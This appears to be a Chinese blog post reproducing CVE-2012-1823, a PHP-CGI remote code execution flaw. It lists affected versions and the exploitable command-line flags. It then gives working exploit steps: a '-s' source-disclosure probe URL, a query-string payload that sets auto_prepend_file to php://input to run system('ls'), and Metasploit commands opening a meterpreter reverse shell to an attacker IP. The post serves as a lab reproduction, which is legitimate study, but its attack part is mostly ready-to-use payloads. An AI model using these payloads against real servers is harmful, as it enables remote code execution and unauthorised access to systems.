CVE-2012-1823复现

PHP-CGI远程代码执行漏洞

这个古老的漏洞,其实就是用户请求的querystring被作为了php-cgi的参数,命令行参数不仅可以通过

#!/usr/local/bin/php-cgi -d include_path=/path的方式传入php-cgi,还可以通过querystring的方式传入。

影响版本

< php-5.3.12php < 5.4.2mod方式、fpm方式不受影响

CGI模式下可控命令行参数

c 指定php.ini文件(PHP的配置文件)的位置n 不要加载php.ini文件d 指定配置项b 启动fastcgi进程s 显示文件源码T 执行指定次该文件h和? 显示帮助

漏洞利用

该站点在8080端口,访问即可

在后面加上-s,若返回源码,则说明存在此漏洞

http://ip:8080/index.php/?-s

执行代码

这里可以通过使用-d来指定auto_prepend_file制造任意文件包含漏洞,使用burpsuite抓包,然后修改数据包内容。使用“+”代替空格%3d代替“=”​​​​​​​

-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input
<?php echo system("ls"); ?>

反弹shell

这里我用了Metasploit​​​​​​​

search php_cgiuse exploit/multi/http/php_cgi_arg_injectionset rhosts 目标ipset rport 8080set payload php/meterpreter/reverse_tcpset lhost 攻击ip

配置如下

配置好了之后执行命令开始攻击

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值